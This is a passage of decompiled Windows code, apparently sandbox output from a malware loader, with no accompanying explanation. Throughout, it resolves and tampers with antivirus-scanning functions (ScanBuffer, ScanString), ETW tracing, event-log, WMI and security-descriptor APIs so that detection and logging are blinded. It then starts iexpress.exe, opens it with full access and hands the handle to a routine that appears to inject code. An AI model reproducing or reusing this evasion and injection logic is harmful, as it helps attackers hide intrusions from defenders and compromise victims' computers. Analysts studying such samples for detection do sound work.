							_push("OpenSession");
							E02514C24();
							E02514A98(_t1988 - 0x76c, E02514D64( *((intOrPtr*)(_t1988 - 0x770))));
							_push( *((intOrPtr*)(_t1988 - 0x76c)));
							_t1603 =  *0x256dcd8; // 0x2a51b38
							E02514BB0(_t1988 - 0x778, _t1603, 0x252ad5c);
							E02514A98(_t1988 - 0x774, E02514D64( *((intOrPtr*)(_t1988 - 0x778))));
							_pop(_t1961);
							E025236CC( *((intOrPtr*)(_t1988 - 0x774)), _t1561, _t1961, _t1987);
							E02514A98(_t1988 - 0x77c, "SystemFunction035");
							_push( *((intOrPtr*)(_t1988 - 0x77c)));
							E02514A98(_t1988 - 0x780, "advapi32");
							_pop(_t1964);
							E025236CC( *((intOrPtr*)(_t1988 - 0x780)), _t1561, _t1964, _t1987);
							_push(0x252ad5c);
							_push( *0x256dcd8);
							_push("OpenSession");
							E02514C24();
							E02514A98(_t1988 - 0x784, E02514D64( *((intOrPtr*)(_t1988 - 0x788))));
							_push( *((intOrPtr*)(_t1988 - 0x784)));
							_t1604 =  *0x256dcd8; // 0x2a51b38
							E02514BB0(_t1988 - 0x790, _t1604, 0x252ad5c);
							E02514A98(_t1988 - 0x78c, E02514D64( *((intOrPtr*)(_t1988 - 0x790))));
							_pop(_t1969);
							E025236CC( *((intOrPtr*)(_t1988 - 0x78c)), _t1561, _t1969, _t1987);
							E02514A98(_t1988 - 0x794, "ReportEventW");
							_push( *((intOrPtr*)(_t1988 - 0x794)));
							E02514A98(_t1988 - 0x798, "advapi32");
							_pop(_t1972);
							E025236CC( *((intOrPtr*)(_t1988 - 0x798)), _t1561, _t1972, _t1987);
							E02524F34(E02514DBC(0x256da84), _t1561, _t1604, _t1986, _t1987, _t1999);
						}
					}
				}
				_push(0x252ad5c);
				_push( *0x256dcd8);
				_push("ScanString");
				E02514C24();
				E02514A98(_t1988 - 0x79c, E02514D64( *((intOrPtr*)(_t1988 - 0x7a0))));
				_push( *((intOrPtr*)(_t1988 - 0x79c)));
				_t1579 =  *0x256dcd8; // 0x2a51b38
				E02514BB0(_t1988 - 0x7a8, _t1579, 0x252ad5c);
				E02514A98(_t1988 - 0x7a4, E02514D64( *((intOrPtr*)(_t1988 - 0x7a8))));
				_pop(_t1665); // executed
				E025236CC( *((intOrPtr*)(_t1988 - 0x7a4)), _t1561, _t1665, _t1987);
				_t713 =  *0x256dce8; // 0x0
				E02514CB0(_t713, 0x252ae54);
				if(_t1996 == 0) {
					_t1262 =  *0x256dce4; // 0x2a51b88
					E02514CB0(_t1262, 0x252ae54);
					if(_t1996 != 0) {
						_t1264 =  *0x256dcec; // 0x0
						E02514CB0(_t1264, 0x252ae54);
						if(_t1996 != 0) {
							_push(0x252ad5c);
							_push( *0x256dcd8);
							_push("ScanBuffer");
							E02514C24();
							E02514A98(_t1988 - 0x7ac, E02514D64( *((intOrPtr*)(_t1988 - 0x7b0))));
							_push( *((intOrPtr*)(_t1988 - 0x7ac)));
							_t1593 =  *0x256dcd8; // 0x2a51b38
							E02514BB0(_t1988 - 0x7b8, _t1593, 0x252ad5c);
							E02514A98(_t1988 - 0x7b4, E02514D64( *((intOrPtr*)(_t1988 - 0x7b8))));
							_pop(_t1896);
							E025236CC( *((intOrPtr*)(_t1988 - 0x7b4)), _t1561, _t1896, _t1987);
							_push(0x252ad5c);
							_push( *0x256dcd8);
							_push("OpenSession");
							E02514C24();
							E02514A98(_t1988 - 0x7bc, E02514D64( *((intOrPtr*)(_t1988 - 0x7c0))));
							_push( *((intOrPtr*)(_t1988 - 0x7bc)));
							_t1594 =  *0x256dcd8; // 0x2a51b38
							E02514BB0(_t1988 - 0x7c8, _t1594, 0x252ad5c);
							E02514A98(_t1988 - 0x7c4, E02514D64( *((intOrPtr*)(_t1988 - 0x7c8))));
							_pop(_t1901);
							E025236CC( *((intOrPtr*)(_t1988 - 0x7c4)), _t1561, _t1901, _t1987);
							WinExec("iexpress", 0);
							 *0x256da9c = E025245F8("iexpress.exe");
							_t1297 =  *0x256da9c; // 0x0
							 *0x256daa0 = OpenProcess(0x1f0fff, 0xffffffff, _t1297);
							_t1299 =  *0x256daa0; // 0x0
							_push(_t1299);
							L025237E0();
							_push(0x252ad5c);
							_push( *0x256dcd8);
							_push("OpenSession");
							E02514C24();
							E02514A98(_t1988 - 0x7cc, E02514D64( *((intOrPtr*)(_t1988 - 0x7d0))));
							_push( *((intOrPtr*)(_t1988 - 0x7cc)));
							_t1595 =  *0x256dcd8; // 0x2a51b38
							E02514BB0(_t1988 - 0x7d8, _t1595, 0x252ad5c);
							E02514A98(_t1988 - 0x7d4, E02514D64( *((intOrPtr*)(_t1988 - 0x7d8))));
							_pop(_t1906);
							E025236CC( *((intOrPtr*)(_t1988 - 0x7d4)), _t1561, _t1906, _t1987);
							_t1315 = E02514DBC(0x256da84);
							_t1316 =  *0x256daa0; // 0x0
							E02523F94(_t1316, _t1561, _t1315, _t1986, _t1987, _t1999);
							_push(0x252ad5c);
							_push( *0x256dcd8);
							_push("OpenSession");
							E02514C24();
							E02514A98(_t1988 - 0x7dc, E02514D64( *((intOrPtr*)(_t1988 - 0x7e0))));
							_push( *((intOrPtr*)(_t1988 - 0x7dc)));
							_t1596 =  *0x256dcd8; // 0x2a51b38
							E02514BB0(_t1988 - 0x7e8, _t1596, 0x252ad5c);
							E02514A98(_t1988 - 0x7e4, E02514D64( *((intOrPtr*)(_t1988 - 0x7e8))));
							_pop(_t1912);
							E025236CC( *((intOrPtr*)(_t1988 - 0x7e4)), _t1561, _t1912, _t1987);
							E02514A98(_t1988 - 0x7ec, "ReportEventA");
							_push( *((intOrPtr*)(_t1988 - 0x7ec)));
							E02514A98(_t1988 - 0x7f0, "advapi32");
							_pop(_t1915);
							E025236CC( *((intOrPtr*)(_t1988 - 0x7f0)), _t1561, _t1915, _t1987);
							_push(0x252ad5c);
							_push( *0x256dcd8);
							_push("OpenSession");
							E02514C24();
							E02514A98(_t1988 - 0x7f4, E02514D64( *((intOrPtr*)(_t1988 - 0x7f8))));
							_push( *((intOrPtr*)(_t1988 - 0x7f4)));
							_t1597 =  *0x256dcd8; // 0x2a51b38
							E02514BB0(_t1988 - 0x800, _t1597, 0x252ad5c);
							E02514A98(_t1988 - 0x7fc, E02514D64( *((intOrPtr*)(_t1988 - 0x800))));
							_pop(_t1920);
							E025236CC( *((intOrPtr*)(_t1988 - 0x7fc)), _t1561, _t1920, _t1987);
							E02514A98(_t1988 - 0x804, "SystemFunction035");
							_push( *((intOrPtr*)(_t1988 - 0x804)));
							E02514A98(_t1988 - 0x808, "advapi32");
							_pop(_t1923);
							E025236CC( *((intOrPtr*)(_t1988 - 0x808)), _t1561, _t1923, _t1987);
							_push(0x252ad5c);
							_push( *0x256dcd8);
							_push("OpenSession");
							E02514C24();
							E02514A98(_t1988 - 0x80c, E02514D64( *((intOrPtr*)(_t1988 - 0x810))));
							_push( *((intOrPtr*)(_t1988 - 0x80c)));
							_t1598 =  *0x256dcd8; // 0x2a51b38
							E02514BB0(_t1988 - 0x818, _t1598, 0x252ad5c);
							E02514A98(_t1988 - 0x814, E02514D64( *((intOrPtr*)(_t1988 - 0x818))));
							_pop(_t1928);
							E025236CC( *((intOrPtr*)(_t1988 - 0x814)), _t1561, _t1928, _t1987);
							E02514A98(_t1988 - 0x81c, "ReportEventW");
							_push( *((intOrPtr*)(_t1988 - 0x81c)));
							E02514A98(_t1988 - 0x820, "advapi32");
							_pop(_t1931);
							E025236CC( *((intOrPtr*)(_t1988 - 0x820)), _t1561, _t1931, _t1987);
							_push(0x252ad5c);
							_push( *0x256dcd8);
							_push("OpenSession");
							E02514C24();
							E02514A98(_t1988 - 0x824, E02514D64( *((intOrPtr*)(_t1988 - 0x828))));
							_push( *((intOrPtr*)(_t1988 - 0x824)));
							_t1599 =  *0x256dcd8; // 0x2a51b38
							E02514BB0(_t1988 - 0x830, _t1599, 0x252ad5c);
							E02514A98(_t1988 - 0x82c, E02514D64( *((intOrPtr*)(_t1988 - 0x830))));
							_pop(_t1936);
							E025236CC( *((intOrPtr*)(_t1988 - 0x82c)), _t1561, _t1936, _t1987);
						}
					}
				}
				_push(0x252ad5c);
				_push( *0x256dcd8);
				_push("ScanString");
				E02514C24();
				E02514A98(_t1988 - 0x834, E02514D64( *((intOrPtr*)(_t1988 - 0x838))));
				_push( *((intOrPtr*)(_t1988 - 0x834)));
				_t1580 =  *0x256dcd8; // 0x2a51b38
				E02514BB0(_t1988 - 0x840, _t1580, 0x252ad5c);
				E02514A98(_t1988 - 0x83c, E02514D64( *((intOrPtr*)(_t1988 - 0x840))));
				_pop(_t1671); // executed
				E025236CC( *((intOrPtr*)(_t1988 - 0x83c)), _t1561, _t1671, _t1987);
				_t729 =  *0x256dce4; // 0x2a51b88
				E02514CB0(_t729, 0x252ae54);
				if(_t1996 == 0) {
					_t1223 =  *0x256dce8; // 0x0
					E02514CB0(_t1223, 0x252ae54);
					if(_t1996 != 0) {
						_t1225 =  *0x256dcec; // 0x0
						E02514CB0(_t1225, 0x252ae54);
						if(_t1996 != 0) {
							_push(0x252ad5c);
							_push( *0x256dcd8);
							_push("ScanBuffer");
							E02514C24();
							E02514A98(_t1988 - 0x844, E02514D64( *((intOrPtr*)(_t1988 - 0x848))));
							_push( *((intOrPtr*)(_t1988 - 0x844)));
							_t1591 =  *0x256dcd8; // 0x2a51b38
							E02514BB0(_t1988 - 0x850, _t1591, 0x252ad5c);
							E02514A98(_t1988 - 0x84c, E02514D64( *((intOrPtr*)(_t1988 - 0x850))));
							_pop(_t1882); // executed
							E025236CC( *((intOrPtr*)(_t1988 - 0x84c)), _t1561, _t1882, _t1987); // executed
							_push(0x252ad5c);
							_push( *0x256dcd8);
							_push("OpenSession");
							E02514C24();
							E02514A98(_t1988 - 0x854, E02514D64( *((intOrPtr*)(_t1988 - 0x858))));
							_push( *((intOrPtr*)(_t1988 - 0x854)));
							_t1592 =  *0x256dcd8; // 0x2a51b38
							E02514BB0(_t1988 - 0x860, _t1592, 0x252ad5c);
							E02514A98(_t1988 - 0x85c, E02514D64( *((intOrPtr*)(_t1988 - 0x860))));
							_pop(_t1887); // executed
							E025236CC( *((intOrPtr*)(_t1988 - 0x85c)), _t1561, _t1887, _t1987); // executed
							E02512FC4(0, _t1988 - 0x864);
							_push( *((intOrPtr*)(_t1988 - 0x864)));
							_t1259 = E02514DBC(0x256da84);
							_pop(_t1260); // executed
							E025248A4(_t1260, _t1561, _t1259, _t1987, _t1999); // executed
						}
					}
				}
				_push(0x252ad5c);
				_push( *0x256dcd8);
				_push(0x252b020);
				_push(0);
				_push(0x252b02c);
				_push(0);
				_push(0x252b038);
				_push(0);
				_push(0x252b044);
				E02514C24();
				E02514A98(_t1988 - 0x868, E02514D64( *((intOrPtr*)(_t1988 - 0x86c))));
				_push( *((intOrPtr*)(_t1988 - 0x868)));
				_t1581 =  *0x256dcd8; // 0x2a51b38
				E02514BB0(_t1988 - 0x874, _t1581, 0x252ad5c);
				E02514A98(_t1988 - 0x870, E02514D64( *((intOrPtr*)(_t1988 - 0x874))));
				_pop(_t1677); // executed
				E025236CC( *((intOrPtr*)(_t1988 - 0x870)), _t1561, _t1677, _t1987); // executed
				E02514A98(_t1988 - 0x878, "ReportEventA");
				_push( *((intOrPtr*)(_t1988 - 0x878)));
				E02514A98(_t1988 - 0x87c, "advapi32");
				_pop(_t1680); // executed
				E025236CC( *((intOrPtr*)(_t1988 - 0x87c)), _t1561, _t1680, _t1987); // executed
				_push(0x252ad5c);
				_push( *0x256dcd8);
				_push("OpenSession");
				E02514C24();
				E02514A98(_t1988 - 0x880, E02514D64( *((intOrPtr*)(_t1988 - 0x884))));
				_push( *((intOrPtr*)(_t1988 - 0x880)));
				_t1582 =  *0x256dcd8; // 0x2a51b38
				E02514BB0(_t1988 - 0x88c, _t1582, 0x252ad5c);
				E02514A98(_t1988 - 0x888, E02514D64( *((intOrPtr*)(_t1988 - 0x88c))));
				_pop(_t1685); // executed
				E025236CC( *((intOrPtr*)(_t1988 - 0x888)), _t1561, _t1685, _t1987); // executed
				E02514A98(_t1988 - 0x890, "SystemFunction035");
				_push( *((intOrPtr*)(_t1988 - 0x890)));
				E02514A98(_t1988 - 0x894, "advapi32");
				_pop(_t1688); // executed
				E025236CC( *((intOrPtr*)(_t1988 - 0x894)), _t1561, _t1688, _t1987); // executed
				_push(0x252ad5c);
				_push( *0x256dcd8);
				_push("OpenSession");
				E02514C24();
				E02514A98(_t1988 - 0x898, E02514D64( *((intOrPtr*)(_t1988 - 0x89c))));
				_push( *((intOrPtr*)(_t1988 - 0x898)));
				_t1583 =  *0x256dcd8; // 0x2a51b38
				E02514BB0(_t1988 - 0x8a4, _t1583, 0x252ad5c);
				E02514A98(_t1988 - 0x8a0, E02514D64( *((intOrPtr*)(_t1988 - 0x8a4))));
				_pop(_t1693); // executed
				E025236CC( *((intOrPtr*)(_t1988 - 0x8a0)), _t1561, _t1693, _t1987); // executed
				E02514A98(_t1988 - 0x8a8, "ReportEventW");
				_push( *((intOrPtr*)(_t1988 - 0x8a8)));
				E02514A98(_t1988 - 0x8ac, "advapi32");
				_pop(_t1696); // executed
				E025236CC( *((intOrPtr*)(_t1988 - 0x8ac)), _t1561, _t1696, _t1987); // executed
				_push(0x252ad5c);
				_push( *0x256dcd8);
				_push("ScanString");
				E02514C24();
				E02514A98(_t1988 - 0x8b0, E02514D64( *((intOrPtr*)(_t1988 - 0x8b4))));
				_push( *((intOrPtr*)(_t1988 - 0x8b0)));
				_t1584 =  *0x256dcd8; // 0x2a51b38
				E02514BB0(_t1988 - 0x8bc, _t1584, 0x252ad5c);
				E02514A98(_t1988 - 0x8b8, E02514D64( *((intOrPtr*)(_t1988 - 0x8bc))));
				_pop(_t1701); // executed
				E025236CC( *((intOrPtr*)(_t1988 - 0x8b8)), _t1561, _t1701, _t1987); // executed
				E02514A98(_t1988 - 0x8c0, "ShellExecuteExA");
				_push( *((intOrPtr*)(_t1988 - 0x8c0)));
				E02514A98(_t1988 - 0x8c4, "shell32");
				_pop(_t1704); // executed
				E025236CC( *((intOrPtr*)(_t1988 - 0x8c4)), _t1561, _t1704, _t1987); // executed
				E02514A98(_t1988 - 0x8c8, "SuspendThread");
				_push( *((intOrPtr*)(_t1988 - 0x8c8)));
				E02514A98(_t1988 - 0x8cc, "kernel32");
				_pop(_t1707);
				E025236CC( *((intOrPtr*)(_t1988 - 0x8cc)), _t1561, _t1707, _t1987);
				_push(0x252ad5c);
				_push( *0x256dcd8);
				_push("OpenSession");
				E02514C24();
				E02514A98(_t1988 - 0x8d0, E02514D64( *((intOrPtr*)(_t1988 - 0x8d4))));
				_push( *((intOrPtr*)(_t1988 - 0x8d0)));
				_t1585 =  *0x256dcd8; // 0x2a51b38
				E02514BB0(_t1988 - 0x8dc, _t1585, 0x252ad5c);
				E02514A98(_t1988 - 0x8d8, E02514D64( *((intOrPtr*)(_t1988 - 0x8dc))));
				_pop(_t1712); // executed
				E025236CC( *((intOrPtr*)(_t1988 - 0x8d8)), _t1561, _t1712, _t1987); // executed
				_push(0x252ad5c);
				_push( *0x256dcd8);
				_push("Initialize");
				E02514C24();
				E02514A98(_t1988 - 0x8e0, E02514D64( *((intOrPtr*)(_t1988 - 0x8e4))));
				_push( *((intOrPtr*)(_t1988 - 0x8e0)));
				_t1586 =  *0x256dcd8; // 0x2a51b38
				E02514BB0(_t1988 - 0x8ec, _t1586, 0x252ad5c);
				E02514A98(_t1988 - 0x8e8, E02514D64( *((intOrPtr*)(_t1988 - 0x8ec))));
				_pop(_t1717); // executed
				E025236CC( *((intOrPtr*)(_t1988 - 0x8e8)), _t1561, _t1717, _t1987); // executed
				E02514A98(_t1988 - 0x8f0, "WmiReceiveNotificationsW");
				_push( *((intOrPtr*)(_t1988 - 0x8f0)));
				E02514A98(_t1988 - 0x8f4, "advapi32");
				_pop(_t1720); // executed
				E025236CC( *((intOrPtr*)(_t1988 - 0x8f4)), _t1561, _t1720, _t1987); // executed
				E02514A98(_t1988 - 0x8f8, "WmiReceiveNotificationsA");
				_push( *((intOrPtr*)(_t1988 - 0x8f8)));
				E02514A98(_t1988 - 0x8fc, "advapi32");
				_pop(_t1723);
				E025236CC( *((intOrPtr*)(_t1988 - 0x8fc)), _t1561, _t1723, _t1987);
				E02514A98(_t1988 - 0x900, "WmiQuerySingleInstanceW");
				_push( *((intOrPtr*)(_t1988 - 0x900)));
				E02514A98(_t1988 - 0x904, "advapi32");
				_pop(_t1726);
				E025236CC( *((intOrPtr*)(_t1988 - 0x904)), _t1561, _t1726, _t1987);
				E02514A98(_t1988 - 0x908, "NotifyChangeEventLog");
				_push( *((intOrPtr*)(_t1988 - 0x908)));
				E02514A98(_t1988 - 0x90c, "advapi32");
				_pop(_t1729);
				E025236CC( *((intOrPtr*)(_t1988 - 0x90c)), _t1561, _t1729, _t1987);
				E02514A98(_t1988 - 0x910, "WmiQueryAllDataA");
				_push( *((intOrPtr*)(_t1988 - 0x910)));
				E02514A98(_t1988 - 0x914, "advapi32");
				_pop(_t1732);
				E025236CC( *((intOrPtr*)(_t1988 - 0x914)), _t1561, _t1732, _t1987);
				E02514A98(_t1988 - 0x918, "WmiOpenBlock");
				_push( *((intOrPtr*)(_t1988 - 0x918)));
				E02514A98(_t1988 - 0x91c, "advapi32");
				_pop(_t1735);
				E025236CC( *((intOrPtr*)(_t1988 - 0x91c)), _t1561, _t1735, _t1987);
				E02514A98(_t1988 - 0x920, "WmiNotificationRegistrationW");
				_push( *((intOrPtr*)(_t1988 - 0x920)));
				E02514A98(_t1988 - 0x924, "advapi32");
				_pop(_t1738);
				E025236CC( *((intOrPtr*)(_t1988 - 0x924)), _t1561, _t1738, _t1987);
				E02514A98(_t1988 - 0x928, "TraceQueryInformation");
				_push( *((intOrPtr*)(_t1988 - 0x928)));
				E02514A98(_t1988 - 0x92c, "advapi32");
				_pop(_t1741);
				E025236CC( *((intOrPtr*)(_t1988 - 0x92c)), _t1561, _t1741, _t1987);
				E02514A98(_t1988 - 0x930, "TraceSetInformation");
				_push( *((intOrPtr*)(_t1988 - 0x930)));
				E02514A98(_t1988 - 0x934, "advapi32");
				_pop(_t1744);
				E025236CC( *((intOrPtr*)(_t1988 - 0x934)), _t1561, _t1744, _t1987);
				E02514A98(_t1988 - 0x938, "TraceMessageVa");
				_push( *((intOrPtr*)(_t1988 - 0x938)));
				E02514A98(_t1988 - 0x93c, "advapi32");
				_pop(_t1747);
				E025236CC( *((intOrPtr*)(_t1988 - 0x93c)), _t1561, _t1747, _t1987);
				E02514A98(_t1988 - 0x940, "TraceMessage");
				_push( *((intOrPtr*)(_t1988 - 0x940)));
				E02514A98(_t1988 - 0x944, "advapi32");
				_pop(_t1750);
				E025236CC( *((intOrPtr*)(_t1988 - 0x944)), _t1561, _t1750, _t1987);
				E02514A98(_t1988 - 0x948, "TraceEvent");
				_push( *((intOrPtr*)(_t1988 - 0x948)));
				E02514A98(_t1988 - 0x94c, "advapi32");
				_pop(_t1753);
				E025236CC( *((intOrPtr*)(_t1988 - 0x94c)), _t1561, _t1753, _t1987);
				E02514A98(_t1988 - 0x950, "TraceEventInstance");
				_push( *((intOrPtr*)(_t1988 - 0x950)));
				E02514A98(_t1988 - 0x954, "advapi32");
				_pop(_t1756);
				E025236CC( *((intOrPtr*)(_t1988 - 0x954)), _t1561, _t1756, _t1987);
				E02514A98(_t1988 - 0x958, "SetTraceCallback");
				_push( *((intOrPtr*)(_t1988 - 0x958)));
				E02514A98(_t1988 - 0x95c, "advapi32");
				_pop(_t1759);
				E025236CC( *((intOrPtr*)(_t1988 - 0x95c)), _t1561, _t1759, _t1987);
				E02514A98(_t1988 - 0x960, "SetSecurityInfo");
				_push( *((intOrPtr*)(_t1988 - 0x960)));
				E02514A98(_t1988 - 0x964, "advapi32");
				_pop(_t1762);
				E025236CC( *((intOrPtr*)(_t1988 - 0x964)), _t1561, _t1762, _t1987);
				E02514A98(_t1988 - 0x968, "SetSecurityInfoExA");
				_push( *((intOrPtr*)(_t1988 - 0x968)));
				E02514A98(_t1988 - 0x96c, "advapi32");
				_pop(_t1765);
				E025236CC( *((intOrPtr*)(_t1988 - 0x96c)), _t1561, _t1765, _t1987);
				E02514A98(_t1988 - 0x970, "SetSecurityInfoExW");
				_push( *((intOrPtr*)(_t1988 - 0x970)));
				E02514A98(_t1988 - 0x974, "advapi32");
				_pop(_t1768);
				E025236CC( *((intOrPtr*)(_t1988 - 0x974)), _t1561, _t1768, _t1987);
				E02514A98(_t1988 - 0x978, "SetSecurityAccessMask");
				_push( *((intOrPtr*)(_t1988 - 0x978)));
				E02514A98(_t1988 - 0x97c, "advapi32");
				_pop(_t1771);
				E025236CC( *((intOrPtr*)(_t1988 - 0x97c)), _t1561, _t1771, _t1987);
				E02514A98(_t1988 - 0x980, "SetPrivateObjectSecurityEx");
				_push( *((intOrPtr*)(_t1988 - 0x980)));
				E02514A98(_t1988 - 0x984, "advapi32");
				_pop(_t1774);
				E025236CC( *((intOrPtr*)(_t1988 - 0x984)), _t1561, _t1774, _t1987);
				E02514A98(_t1988 - 0x988, "SetKernelObjectSecurity");
				_push( *((intOrPtr*)(_t1988 - 0x988)));
				E02514A98(_t1988 - 0x98c, "advapi32");
				_pop(_t1777);
				E025236CC( *((intOrPtr*)(_t1988 - 0x98c)), _t1561, _t1777, _t1987);
				E02514A98(_t1988 - 0x990, "SetFileSecurityW");
				_push( *((intOrPtr*)(_t1988 - 0x990)));
				E02514A98(_t1988 - 0x994, "advapi32");
				_pop(_t1780);
				E025236CC( *((intOrPtr*)(_t1988 - 0x994)), _t1561, _t1780, _t1987);
				E02514A98(_t1988 - 0x998, "SetFileSecurityA");
				_push( *((intOrPtr*)(_t1988 - 0x998)));
				E02514A98(_t1988 - 0x99c, "advapi32");
				_pop(_t1783);
				E025236CC( *((intOrPtr*)(_t1988 - 0x99c)), _t1561, _t1783, _t1987);
				E02514A98(_t1988 - 0x9a0, "SaferSetPolicyInformation");
				_push( *((intOrPtr*)(_t1988 - 0x9a0)));
				E02514A98(_t1988 - 0x9a4, "advapi32");
				_pop(_t1786);
				E025236CC( *((intOrPtr*)(_t1988 - 0x9a4)), _t1561, _t1786, _t1987);
				E02514A98(_t1988 - 0x9a8, "SaferSetLevelInformation");
				_push( *((intOrPtr*)(_t1988 - 0x9a8)));
				E02514A98(_t1988 - 0x9ac, "advapi32");
				_pop(_t1789);
				E025236CC( *((intOrPtr*)(_t1988 - 0x9ac)), _t1561, _t1789, _t1987);
				E02514A98(_t1988 - 0x9b0, "ReportEventW");
				_push( *((intOrPtr*)(_t1988 - 0x9b0)));
				E02514A98(_t1988 - 0x9b4, "advapi32");
				_pop(_t1792);
				E025236CC( *((intOrPtr*)(_t1988 - 0x9b4)), _t1561, _t1792, _t1987);
				E02514A98(_t1988 - 0x9b8, "ReportEventA");
				_push( *((intOrPtr*)(_t1988 - 0x9b8)));
				E02514A98(_t1988 - 0x9bc, "advapi32");
				_pop(_t1795);
				E025236CC( *((intOrPtr*)(_t1988 - 0x9bc)), _t1561, _t1795, _t1987);
				E02514A98(_t1988 - 0x9c0, "ReadEventLogW");
				_push( *((intOrPtr*)(_t1988 - 0x9c0)));
				E02514A98(_t1988 - 0x9c4, "advapi32");
				_pop(_t1798);
				E025236CC( *((intOrPtr*)(_t1988 - 0x9c4)), _t1561, _t1798, _t1987);
				E02514A98(_t1988 - 0x9c8, "ReadEventLogA");
				_push( *((intOrPtr*)(_t1988 - 0x9c8)));
				E02514A98(_t1988 - 0x9cc, "advapi32");
				_pop(_t1801);
				E025236CC( *((intOrPtr*)(_t1988 - 0x9cc)), _t1561, _t1801, _t1987);
				E02514A98(_t1988 - 0x9d0, "OpenEventLogW");
				_push( *((intOrPtr*)(_t1988 - 0x9d0)));
				E02514A98(_t1988 - 0x9d4, "advapi32");
				_pop(_t1804);
				E025236CC( *((intOrPtr*)(_t1988 - 0x9d4)), _t1561, _t1804, _t1987);
				E02514A98(_t1988 - 0x9d8, "OpenEventLogA");
				_push( *((intOrPtr*)(_t1988 - 0x9d8)));
				E02514A98(_t1988 - 0x9dc, "advapi32");
				_pop(_t1807);
				E025236CC( *((intOrPtr*)(_t1988 - 0x9dc)), _t1561, _t1807, _t1987);
				E02514A98(_t1988 - 0x9e0, "SaferRecordEventLogEntry");
				_push( *((intOrPtr*)(_t1988 - 0x9e0)));
				E02514A98(_t1988 - 0x9e4, "advapi32");
				_pop(_t1810);
				E025236CC( *((intOrPtr*)(_t1988 - 0x9e4)), _t1561, _t1810, _t1987);
				E02514A98(_t1988 - 0x9e8, "GetEventLogInformation");
				_push( *((intOrPtr*)(_t1988 - 0x9e8)));
				E02514A98(_t1988 - 0x9ec, "advapi32");
				_pop(_t1813);
				E025236CC( *((intOrPtr*)(_t1988 - 0x9ec)), _t1561, _t1813, _t1987);
				E02514A98(_t1988 - 0x9f0, "ElfReadEventLogW");
				_push( *((intOrPtr*)(_t1988 - 0x9f0)));
				E02514A98(_t1988 - 0x9f4, "advapi32");
				_pop(_t1816);
				E025236CC( *((intOrPtr*)(_t1988 - 0x9f4)), _t1561, _t1816, _t1987);
				E02514A98(_t1988 - 0x9f8, "ElfReadEventLogA");
				_push( *((intOrPtr*)(_t1988 - 0x9f8)));
				E02514A98(_t1988 - 0x9fc, "advapi32");
				_pop(_t1819);
				E025236CC( *((intOrPtr*)(_t1988 - 0x9fc)), _t1561, _t1819, _t1987);
				E02514A98(_t1988 - 0xa00, "ElfOpenEventLogW");
				_push( *((intOrPtr*)(_t1988 - 0xa00)));
				E02514A98(_t1988 - 0xa04, "advapi32");
				_pop(_t1822);
				E025236CC( *((intOrPtr*)(_t1988 - 0xa04)), _t1561, _t1822, _t1987);
				E02514A98(_t1988 - 0xa08, "ElfOpenEventLogA");
				_push( *((intOrPtr*)(_t1988 - 0xa08)));
				E02514A98(_t1988 - 0xa0c, "advapi32");
				_pop(_t1825);
				E025236CC( *((intOrPtr*)(_t1988 - 0xa0c)), _t1561, _t1825, _t1987);
				E02514A98(_t1988 - 0xa10, "BuildSecurityDescriptorA");
				_push( *((intOrPtr*)(_t1988 - 0xa10)));
				E02514A98(_t1988 - 0xa14, "advapi32");
				_pop(_t1828);
				E025236CC( *((intOrPtr*)(_t1988 - 0xa14)), _t1561, _t1828, _t1987);
				E02514A98(_t1988 - 0xa18, "BuildImpersonateTrusteeW");
				_push( *((intOrPtr*)(_t1988 - 0xa18)));
				E02514A98(_t1988 - 0xa1c, "advapi32");
				_pop(_t1831);
				E025236CC( *((intOrPtr*)(_t1988 - 0xa1c)), _t1561, _t1831, _t1987);
				E02514A98(_t1988 - 0xa20, "BuildSecurityDescriptorW");
				_push( *((intOrPtr*)(_t1988 - 0xa20)));
				E02514A98(_t1988 - 0xa24, "advapi32");
				_pop(_t1834);
				E025236CC( *((intOrPtr*)(_t1988 - 0xa24)), _t1561, _t1834, _t1987);
				E02514A98(_t1988 - 0xa28, "AccessCheckByType");
				_push( *((intOrPtr*)(_t1988 - 0xa28)));
				E02514A98(_t1988 - 0xa2c, "advapi32");
				_pop(_t1837);
				E025236CC( *((intOrPtr*)(_t1988 - 0xa2c)), _t1561, _t1837, _t1987);
				_push(0x252ad5c);
				_push( *0x256dcd8);
				_push("ScanBuffer");
				E02514C24();
				E02514A98(_t1988 - 0xa30, E02514D64( *((intOrPtr*)(_t1988 - 0xa34))));
				_push( *((intOrPtr*)(_t1988 - 0xa30)));
				_t1587 =  *0x256dcd8; // 0x2a51b38
				E02514BB0(_t1988 - 0xa3c, _t1587, 0x252ad5c);
				E02514A98(_t1988 - 0xa38, E02514D64( *((intOrPtr*)(_t1988 - 0xa3c))));
				_pop(_t1842); // executed
				E025236CC( *((intOrPtr*)(_t1988 - 0xa38)), _t1561, _t1842, _t1987); // executed
				_push(0x252ad5c);
				_push( *0x256dcd8);
				_push("OpenSession");
				E02514C24();
				E02514A98(_t1988 - 0xa40, E02514D64( *((intOrPtr*)(_t1988 - 0xa44))));
				_push( *((intOrPtr*)(_t1988 - 0xa40)));
				_t1588 =  *0x256dcd8; // 0x2a51b38
				E02514BB0(_t1988 - 0xa4c, _t1588, 0x252ad5c);
				E02514A98(_t1988 - 0xa48, E02514D64( *((intOrPtr*)(_t1988 - 0xa4c))));
				_pop(_t1847); // executed
				E025236CC( *((intOrPtr*)(_t1988 - 0xa48)), _t1561, _t1847, _t1987); // executed
				E02514A98(_t1988 - 0xa50, "NtCreateFile");
				_push( *((intOrPtr*)(_t1988 - 0xa50)));
				E02514A98(_t1988 - 0xa54, "ntdll");
				_pop(_t1850); // executed
				E025236CC( *((intOrPtr*)(_t1988 - 0xa54)), _t1561, _t1850, _t1987); // executed
				E02514A98(_t1988 - 0xa58, "EtwEventWriteEx");
				_push( *((intOrPtr*)(_t1988 - 0xa58)));
				E02514A98(_t1988 - 0xa5c, "ntdll");
				_pop(_t1853);
				E025236CC( *((intOrPtr*)(_t1988 - 0xa5c)), _t1561, _t1853, _t1987);
				E02514A98(_t1988 - 0xa60, "NtOpenFile");
				_push( *((intOrPtr*)(_t1988 - 0xa60)));
				E02514A98(_t1988 - 0xa64, "ntdll");
				_pop(_t1856);
				E025236CC( *((intOrPtr*)(_t1988 - 0xa64)), _t1561, _t1856, _t1987);
				E02514A98(_t1988 - 0xa68, "EtwEventWrite");
				_push( *((intOrPtr*)(_t1988 - 0xa68)));
				E02514A98(_t1988 - 0xa6c, "ntdll");
				_pop(_t1859);
				E025236CC( *((intOrPtr*)(_t1988 - 0xa6c)), _t1561, _t1859, _t1987);
				ExitProcess(0); // executed
				_pop(_t1860);
				 *[fs:eax] = _t1860;
				_push(E0252A8E4);
				E025148C4(_t1988 - 0xa6c, 0x64);
